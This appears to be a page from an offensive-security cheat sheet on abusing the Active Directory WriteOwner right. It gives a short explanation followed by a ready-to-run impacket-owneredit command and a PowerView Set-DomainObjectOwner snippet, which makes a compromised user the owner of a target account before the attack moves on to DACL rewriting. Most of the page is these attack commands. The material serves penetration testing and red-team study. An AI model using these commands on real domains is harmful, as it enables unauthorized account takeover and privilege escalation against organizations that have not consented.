WriteOwner

Information

Ownership give us the right to modify the object's permissions (DACL).
Once we're owner, we can give ourselves FullControl, we don’t automatically get it.

This permission has the ability to modify the owner of the user, i.e, give the Owns permission, which can then being used to modify object security descriptors, regardless of permissions on the object's DACL.

impacket-owneredit -action write -new-owner <compromised-user> -target <target-account> <domain>/<compromised-user>:<pass>

# Create an object with the compromised account's credentials
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)

# Set the ownership of the target object with PowerView
Set-DomainObjectOwner -Credential $Cred -TargetIdentity "<target-account>" -OwnerIdentity "<compromised-user>"

For subsequent exploitation steps check WriteDACL.

PreviousReadLAPSPassword NextWriteDACL

Last updated 2 months ago

Was this helpful?